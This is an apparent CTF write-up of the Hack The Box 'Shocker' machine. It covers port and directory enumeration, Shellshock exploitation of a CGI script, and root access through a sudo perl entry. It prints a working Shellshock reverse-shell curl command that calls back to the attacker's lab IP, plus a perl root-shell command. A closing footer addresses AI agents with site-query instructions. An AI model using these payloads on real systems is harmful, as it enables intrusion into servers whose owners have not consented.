# Shocker Writeup

![](/files/-MapCqoBJ90mprNKt4Tx)

## Reconnaissance

Initial Nmap Scan to find open ports, using treat all hosts as online (**-Pn)** &#x20;

```bash
nmap -Pn 10.10.10.56
```

![](/files/-MapDq8DlLce-bWTPW0l)

Detailed Nmap Scan :&#x20;

Command Breakdown:&#x20;

* (**-sV):** Service version
* (**-sC**): Default nmap scripts
* (**-p):** Specifying ports 80, 2222
* (**-oN nmap**): Saving it into a files called nmap

```
nmap -sC -sV -p 80,2222 -oN nmap 10.10.10.56
```

![](/files/-MapE7konLITt0NWYZpH)

## Enumeration

Lets visit the website

![](/files/-MapFX3N2xZ6g8Ab2TFQ)

It is just few words and an image and there is nothing of interest in the source code, so lets use Gobuster to find hidden directories on the webserver.

```
goubster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.56
```

We only got one directory and we did not have access to it. Well now after thinking for a while, I thought about why the name of the machine is "Shocker", and there was only port for us to enumerate and that is port 80 , a webserver, so I went to google and searched something along of the lines of "Shocker website vulnerabilities" and then I found that there is a vulnerability that "Shellshock" can exploit. Further research told me that this vulnerability affect web servers that used CGI (Command Gateway Interface), a system utilized for generating dynamic web content. When thinking of CGI, we usually see directories like /cgi-bin and /cgi-sys, so I searched up different directories like that.

![](/files/-MapHn2_NO1SHIuAPEkb)

And it was a not found error, then I was looking at the next tab and thought why don't I add a backslash at the end of the URL and see what it does. To my surprise, it gave me 403 Forbidden Error, which means that the directory is present but we are not allowed to access it. Now I was curios as to if I could add / to every directory I was searching for with Gobuster and would that give me different results like this experiment did. (**-f**) for adding "/" at the end of every directory search.

![](/files/-MapIwticplL3JIkENTe)

We were not allowed to access "icons" , so lets try searching for directories or files in /cgi-bin/ with some common extensions. (**-x**) for specifying extensions

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.56/cgi-bin/ -f -x php,html,txt,sh
```

![](/files/-MapJytpLlCV6xbjyEiF)

Looks like we found a file, lets go check what it contains.

![](/files/-MapKBw9YFp81n3fFj9m)

When visiting the page, we are given the option of downloading the file.&#x20;

![](/files/-MapKg2xGYr8Rq_t2m19)

## Exploitation

Now we do not have any other information except this bash script and it also has "Content-Type: text/plain" which is interesting , and what is the number one tool for Web exploitation? Burp Suite, so lets try checking it out on Burp Suite, I capturing the request to the script and sent it Repeater.&#x20;

![](/files/-MapMRMplTmRZJ8uDJhi)

Now we know from our Enumeration that this is vulnerable to Shellshock so I went to google and searched it up when I found an [article ](https://ethicalhackingguru.com/how-to-exploit-the-shellshock-vulnerability/)showing us how we could send a reverse shell to the webserver and get a shell on our machine, so I tried that.

We have to use a tool called "curl" , a tool that is used to send web requests to a webserver using our terminal.

```
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.19/1234 0>&1' http://10.10.10.56/cgi-bin/user.sh
```

And also start a Netcat listener&#x20;

```
nc -lvnp 1234
```

And when you hit enter on the command, you get a reverse shell, but as a low privilege user

![](/files/-MapP6yF3odWDLsDoMI0)

## Privilege Escalation

Lets run "sudo -l" to see what we can run as root.

![](/files/-MapPgTnnh8PPHjmaqxE)

Looks like we can run /usr/bin/perl as root without a password, so now lets go to [GTFOBins ](https://gtfobins.github.io/gtfobins/perl/#sudo)and find the command to let us privilege escalate to root. And the command is&#x20;

```
sudo perl -e 'exec "/bin/sh";'
```

![](/files/-MapQFRXq3sk1f2PGYxM)

And we are root!


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://writeups.adityadindi.com/hackthebox/linux-boxes-w-o-metasploit/shocker-writeup.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.